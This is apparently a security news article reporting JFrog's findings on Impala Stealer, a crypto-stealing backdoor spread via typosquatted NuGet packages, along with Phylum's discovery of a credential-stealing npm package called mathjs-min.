Cybersecurity researchers have detailed the inner workings of the cryptocurrency stealer malware that was distributed via 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers.
The sophisticated typosquatting campaign, which was uncovered by JFrog late last month, impersonated legitimate packages to execute PowerShell code designed to retrieve a follow-on binary from a hard-coded server.
The two-stage attack culminates in the deployment of a .NET-based persistent backdoor, called Impala Stealer, which is capable of gaining unauthorized access to users’ cryptocurrency accounts.
“The payload used a very rare obfuscation technique, called ‘.NET AoT compilation,’ which is a lot more stealthy than using ‘off the shelf’ obfuscators while still making the binary hard to reverse engineer,” JFrog told The Hacker News in a statement.
.NET AoT compilation is an optimization technique that allows apps to be ahead-of-time compiled to native code. Native AOT apps also have faster startup time and smaller memory footprints, and can run on a machine without .NET runtime installed.
“The bad actors used typosquatting techniques to deploy a custom malicious payload […] which targets the Exodus crypto wallet and leaks the victim’s credentials to cryptocurrency exchanges, by using code injection,” Shachar Menashe, senior director at JFrog Security Research, said.
“Our investigation proves no open source software repository is completely trust-worthy, so safety measures should be taken at every step of the software development lifecycle to ensure the software supply chain remains secure.”
The findings come as Phylum unearthed a malicious npm package named mathjs-min that was uploaded to the repository on March 26, 2023, and found to harbor a credential stealer that grabs Discord passwords from the official app as well as web browsers like Google Chrome, Brave, and Opera.